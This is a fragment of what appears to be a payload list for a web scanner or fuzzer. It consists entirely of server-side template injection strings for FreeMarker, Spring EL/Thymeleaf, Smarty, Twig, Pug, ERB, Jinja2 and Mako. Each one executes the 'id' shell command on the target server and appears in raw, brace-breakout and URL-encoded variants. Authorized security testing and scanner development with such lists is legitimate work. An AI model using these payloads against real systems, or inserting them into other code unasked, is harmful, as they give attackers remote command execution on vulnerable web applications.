        "[#assign ex = 'freemarker.template.utility.Execute'?new()]${ ex('id')}",
        "}[#assign ex = 'freemarker.template.utility.Execute'?new()]${ ex('id')}",
        "%5B%23assign%20ex%20%3D%20%27freemarker.template.utility.Execute%27%3Fnew%28%29%5D%24%7B%20ex%28%27id%27%29%7D",
        "}%5B%23assign%20ex%20%3D%20%27freemarker.template.utility.Execute%27%3Fnew%28%29%5D%24%7B%20ex%28%27id%27%29%7D",
        "${"freemarker.template.utility.Execute"?new()("id")}",
        "}${"freemarker.template.utility.Execute"?new()("id")}",
        "%24%7B%22freemarker.template.utility.Execute%22%3Fnew%28%29%28%22id%22%29%7D",
        "}%24%7B%22freemarker.template.utility.Execute%22%3Fnew%28%29%28%22id%22%29%7D",
        "*{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec('id').getInputStream())}",
        "}*{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec('id').getInputStream())}",
        "%2A%7BT%28org.apache.commons.io.IOUtils%29.toString%28T%28java.lang.Runtime%29.getRuntime%28%29.exec%28%27id%27%29.getInputStream%28%29%29%7D",
        "}%2A%7BT%28org.apache.commons.io.IOUtils%29.toString%28T%28java.lang.Runtime%29.getRuntime%28%29.exec%28%27id%27%29.getInputStream%28%29%29%7D",
        "__${new java.util.Scanner(T(java.lang.Runtime).getRuntime().exec("id").getInputStream()).next()}__::.x",
        "}__${new java.util.Scanner(T(java.lang.Runtime).getRuntime().exec("id").getInputStream()).next()}__::.x",
        "__%24%7Bnew%20java.util.Scanner%28T%28java.lang.Runtime%29.getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%29.next%28%29%7D__%3A%3A.x",
        "}__%24%7Bnew%20java.util.Scanner%28T%28java.lang.Runtime%29.getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%29.next%28%29%7D__%3A%3A.x",
        "{system('id')}",
        "}{system('id')}",
        "%7Bsystem%28%27id%27%29%7D",
        "}%7Bsystem%28%27id%27%29%7D",
        "{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}",
        "}{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}",
        "%7B%7B_self.env.registerUndefinedFilterCallback%28%22exec%22%29%7D%7D%7B%7B_self.env.getFilter%28%22id%22%29%7D%7D",
        "}%7B%7B_self.env.registerUndefinedFilterCallback%28%22exec%22%29%7D%7D%7B%7B_self.env.getFilter%28%22id%22%29%7D%7D",
        "{{['id']|filter('system')}}",
        "}{{['id']|filter('system')}}",
        "%7B%7B%5B%27id%27%5D%7Cfilter%28%27system%27%29%7D%7D",
        "}%7B%7B%5B%27id%27%5D%7Cfilter%28%27system%27%29%7D%7D",
        "{{['id',""]|sort('system')}}",
        "}{{['id',""]|sort('system')}}",
        "%7B%7B%5B%27id%27%2C%22%22%5D%7Csort%28%27system%27%29%7D%7D",
        "}%7B%7B%5B%27id%27%2C%22%22%5D%7Csort%28%27system%27%29%7D%7D",
        "#{function(){localLoad=global.process.mainModule.constructor._load;sh=localLoad("child_process").exec('id')}()}",
        "}#{function(){localLoad=global.process.mainModule.constructor._load;sh=localLoad("child_process").exec('id')}()}",
        "%23%7Bfunction%28%29%7BlocalLoad%3Dglobal.process.mainModule.constructor._load%3Bsh%3DlocalLoad%28%22child_process%22%29.exec%28%27id%27%29%7D%28%29%7D",
        "}%23%7Bfunction%28%29%7BlocalLoad%3Dglobal.process.mainModule.constructor._load%3Bsh%3DlocalLoad%28%22child_process%22%29.exec%28%27id%27%29%7D%28%29%7D",
        "<%= system("id") %>",
        "}<%= system("id") %>",
        "%3C%25%3D%20system%28%22id%22%29%20%25%3E",
        "}%3C%25%3D%20system%28%22id%22%29%20%25%3E",
        "<% require 'open3' %><% @a,@b,@c,@d=Open3.popen3('id') %><%= @b.readline()%>",
        "}<% require 'open3' %><% @a,@b,@c,@d=Open3.popen3('id') %><%= @b.readline()%>",
        "%3C%25%20require%20%27open3%27%20%25%3E%3C%25%20%40a%2C%40b%2C%40c%2C%40d%3DOpen3.popen3%28%27id%27%29%20%25%3E%3C%25%3D%20%40b.readline%28%29%25%3E",
        "}%3C%25%20require%20%27open3%27%20%25%3E%3C%25%20%40a%2C%40b%2C%40c%2C%40d%3DOpen3.popen3%28%27id%27%29%20%25%3E%3C%25%3D%20%40b.readline%28%29%25%3E",
        "<% require 'open4' %><% @a,@b,@c,@d=Open4.popen4('id') %><%= @c.readline()%>",
        "}<% require 'open4' %><% @a,@b,@c,@d=Open4.popen4('id') %><%= @c.readline()%>",
        "%3C%25%20require%20%27open4%27%20%25%3E%3C%25%20%40a%2C%40b%2C%40c%2C%40d%3DOpen4.popen4%28%27id%27%29%20%25%3E%3C%25%3D%20%40c.readline%28%29%25%3E",
        "}%3C%25%20require%20%27open4%27%20%25%3E%3C%25%20%40a%2C%40b%2C%40c%2C%40d%3DOpen4.popen4%28%27id%27%29%20%25%3E%3C%25%3D%20%40c.readline%28%29%25%3E",
        "{{os.system('id')}}",
        "}{{os.system('id')}}",
        "%7B%7Bos.system%28%27id%27%29%7D%7D",
        "}%7B%7Bos.system%28%27id%27%29%7D%7D",
        "{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('id').read() }}",
        "}{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('id').read() }}",
        "%7B%7B%20self._TemplateReference__context.cycler.__init__.__globals__.os.popen%28%27id%27%29.read%28%29%20%7D%7D",
        "}%7B%7B%20self._TemplateReference__context.cycler.__init__.__globals__.os.popen%28%27id%27%29.read%28%29%20%7D%7D",
        "{{ self._TemplateReference__context.joiner.__init__.__globals__.os.popen('id').read() }}",
        "}{{ self._TemplateReference__context.joiner.__init__.__globals__.os.popen('id').read() }}",
        "%7B%7B%20self._TemplateReference__context.joiner.__init__.__globals__.os.popen%28%27id%27%29.read%28%29%20%7D%7D",
        "}%7B%7B%20self._TemplateReference__context.joiner.__init__.__globals__.os.popen%28%27id%27%29.read%28%29%20%7D%7D",
        "{{ self._TemplateReference__context.namespace.__init__.__globals__.os.popen('id').read() }}",
        "}{{ self._TemplateReference__context.namespace.__init__.__globals__.os.popen('id').read() }}",
        "%7B%7B%20self._TemplateReference__context.namespace.__init__.__globals__.os.popen%28%27id%27%29.read%28%29%20%7D%7D",
        "}%7B%7B%20self._TemplateReference__context.namespace.__init__.__globals__.os.popen%28%27id%27%29.read%28%29%20%7D%7D",
        "{{ cycler.__init__.__globals__.os.popen('id').read() }}",
        "}{{ cycler.__init__.__globals__.os.popen('id').read() }}",
        "%7B%7B%20cycler.__init__.__globals__.os.popen%28%27id%27%29.read%28%29%20%7D%7D",
        "}%7B%7B%20cycler.__init__.__globals__.os.popen%28%27id%27%29.read%28%29%20%7D%7D",
        "{{ joiner.__init__.__globals__.os.popen('id').read() }}",
        "}{{ joiner.__init__.__globals__.os.popen('id').read() }}",
        "%7B%7B%20joiner.__init__.__globals__.os.popen%28%27id%27%29.read%28%29%20%7D%7D",
        "}%7B%7B%20joiner.__init__.__globals__.os.popen%28%27id%27%29.read%28%29%20%7D%7D",
        "{{ namespace.__init__.__globals__.os.popen('id').read() }}",
        "}{{ namespace.__init__.__globals__.os.popen('id').read() }}",
        "%7B%7B%20namespace.__init__.__globals__.os.popen%28%27id%27%29.read%28%29%20%7D%7D",
        "}%7B%7B%20namespace.__init__.__globals__.os.popen%28%27id%27%29.read%28%29%20%7D%7D",
        "<% import os x=os.popen('id').read() %> ${x}",
        "}<% import os x=os.popen('id').read() %> ${x}",
        "%3C%25%20import%20os%20x%3Dos.popen%28%27id%27%29.read%28%29%20%25%3E%20%24%7Bx%7D",
        "}%3C%25%20import%20os%20x%3Dos.popen%28%27id%27%29.read%28%29%20%25%3E%20%24%7Bx%7D",